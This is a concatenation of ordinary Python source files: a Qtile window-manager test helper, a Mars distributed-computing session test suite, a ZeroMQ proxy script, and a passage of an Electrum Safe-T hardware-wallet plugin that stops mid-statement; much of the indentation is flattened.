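#             raise ValueError("not ready yet")
#         return True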
class BareConfig(Config):
auto_fullscreen = True
groups = [config.Group("a"), config.Group("b"), config.Group("c"), config.Group("d")]
layouts = [layout.stack.Stack(num_stacks=1), layout.stack.Stack(num_stacks=2)]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == "OK":
return True
return False
class TestManager:
"""Spawn a Qtile instance
    Set up a Qtile server instance on the given display, with the given socket
    and log files. The Qtile server must be started, and then stopped when it
    is done. Windows can be spawned for the Qtile instance to interact with
    via various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg="Window never appeared...")
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError("window is still in client list!")
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal", export_sni=False):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Setting `export_sni` to True will publish a simplified StatusNotifierItem interface
on DBus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
args = [python, path, "--name", wmclass, name, wm_type]
if export_sni:
args.append("export_sni_interface")
return self._spawn_window(*args)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError("Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
@Retry(ignore_exceptions=(AssertionError,), fail_msg="Window did not die!")
def assert_window_died(client, window_info):
client.sync()
wid = window_info["id"]
assert wid not in set([x["id"] for x in client.windows()])
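# Illustrative sketch (not part of the suite): how TestManager is typically
# driven. "SomeBackend" stands in for a concrete Backend subclass provided by
# test/backend/<backend>/; the real wiring is done by the pytest fixtures.
#
#     with TestManager(SomeBackend(env={}), debug_log=False) as manager:
#         manager.start(BareConfig)
#         proc = manager.test_window("one")
#         manager.kill_window(proc)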
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
import mars.dataframe as md
import mars.tensor as mt
import mars.remote as mr
from mars.config import option_context
from mars.deploy.oscar.session import get_default_async_session, \
get_default_session, new_session, execute, fetch, stop_server, \
AsyncSession, _IsolatedWebSession
from mars.deploy.oscar.local import new_cluster
from mars.deploy.oscar.service import load_config
from mars.lib.aio import new_isolation
from mars.storage import StorageLevel
from mars.services.storage import StorageAPI
from mars.tensor.arithmetic.add import TensorAdd
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_config.yml')
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_vineyard_config.yml')
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), 'local_test_with_third_parity_modules_config.yml')
params = ['default']
if vineyard is not None:
params.append('vineyard')
@pytest.mark.parametrize(indirect=True)
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == 'default':
config = CONFIG_TEST_FILE
elif request.param == 'vineyard':
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get('POOL_START_METHOD', None)
client = await new_cluster(subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False)
async with client:
if request.param == 'default':
assert client.session.client is not None
yield client
def _assert_storage_cleaned(session_id: str,
addr: str,
level: StorageLevel):
async def _assert(session_id: str,
addr: str,
level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop).result()
@pytest.mark.asyncio
async def test_execute(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < .7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < .7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list('abcd'))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
def _my_func():
print('output from function')
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert 'output from function' in str(r.fetch_log(session=session))
assert 'output from function' in str(r.fetch_log(session=session,
offsets='0k',
sizes=[1000]))
assert 'output from function' in str(r.fetch_log(session=session,
offsets={r.op.key: '0k'},
sizes=[1000]))
AsyncSession.reset_default()
await session.destroy()
@pytest.mark.asyncio
async def test_web_session(create_cluster):
session_id = str(uuid.uuid4())
web_address = create_cluster.web_address
session = await AsyncSession.init(web_address, session_id)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(create_cluster)
await test_iterative_tiling(create_cluster)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, 'test.csv')
pdf = pd.DataFrame(np.random.RandomState(0).rand(100, 10),
columns=[f'col{i}' for i in range(10)])
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(session.session_id, worker_pool.external_address,
StorageLevel.MEMORY)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({'show_progress': False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({
'a': rs.randint(10, size=10),
'b': rs.rand(10)
})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby('a').agg('mean', method='shuffle')
result = df2.execute().fetch()
expected = pdf.groupby('a').agg('mean')
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
@pytest.mark.parametrize(
'test_func', [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop).result()
def cancel():
time.sleep(.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config['third_party_modules'] = set()
with pytest.raises(TypeError, match='set'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'supervisor': ['not_exists_for_supervisor']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_supervisor'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = {'worker': ['not_exists_for_worker']}
with pytest.raises(ModuleNotFoundError, match='not_exists_for_worker'):
new_session(n_cpu=2, web=False, config=config)
config['third_party_modules'] = ['mars.deploy.oscar.tests.modules.replace_op']
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(n_cpu=2, web=False,
config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE)
# web not started
assert session._session.client.web_address is None
with session:
# 1 supervisor, 1 worker main pool, 2 worker sub pools.
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
|
zmqRouter.py
|
import zmq
from threading import Thread
import json
import argparse
import os
from zmqtest.asyncsrv import tprint
CONFIG_ERROR = "Config file error. "
def generateDefaultConfig(configPath):
"""
如果没有router.json的配置文件的话就生成默认zmq代理模块的配置
:param configPath:
:return:
"""
routerConfig = {}
routerConfig["front_addr"] = "tcp://*:5559"
routerConfig["back_addr"] = "tcp://*:5560"
    config = {}
    config["routerParams"] = routerConfig
    try:
        with open(configPath, 'w') as f:
            f.write(json.dumps(config))
except IOError:
return False
return True
def create_router(front_addr,back_addr):
context = zmq.Context()
frontEnd = context.socket(zmq.ROUTER)
backEnd = context.socket(zmq.DEALER)
frontEnd.bind(front_addr)
backEnd.bind(back_addr)
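    # the ROUTER socket faces clients on front_addr, the DEALER faces workers on back_addr;
    # zmq.proxy shuttles messages between them and blocks until the context terminates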
print("zmq.proxy started ")
zmq.proxy(frontEnd,backEnd)
# We never get here...
frontEnd.close()
backEnd.close()
context.term()
def main_router():
print("Current libzmq version is %s" % zmq.zmq_version())
print("Current pyzmq version is %s" % zmq.pyzmq_version())
parser = argparse.ArgumentParser()
parser.add_argument("--configPath",type=str,default = "router.json")
args = parser.parse_args()
front_addr = ""
back_addr = ""
    if not os.path.exists(args.configPath):
        if not generateDefaultConfig(args.configPath):
print("Generate default config file failed.")
front_addr = "tcp://*:5559"
back_addr = "tcp://*:5560"
print("Using default config parameters.")
else:
try:
with open(args.configPath,'r')as f:
config = json.loads(f.read())
if "routerParams" in config:
if "front_addr" in config["routerParams"]:
front_addr = config["routerParams"]["front_addr"]
else:
tprint(CONFIG_ERROR + "Missing front_addr")
if "back_addr" in config["routerParams"]:
back_addr = config["routerParams"]["back_addr"]
else:
tprint(CONFIG_ERROR + "Missing back_addr.")
else:
tprint(CONFIG_ERROR + "Missing routerParams.")
except IOError:
print("File is not accessible.")
print("front_addr : ",front_addr)
print("back_addr : ",back_addr)
broker_verifier = Thread(target=create_router, args=(front_addr, back_addr))
broker_verifier.start()
    # wait for the proxy thread; zmq.proxy blocks until the process is interrupted
    broker_verifier.join()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitgesell"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
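        # translate the Electrum BIP32 node into the safetlib HDNodeType message
        # (fingerprint and child number are converted from big-endian bytes to ints)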
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
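        # append the SIGHASH_ALL byte (0x01, hex-encoded) to each signature returned by the device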
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
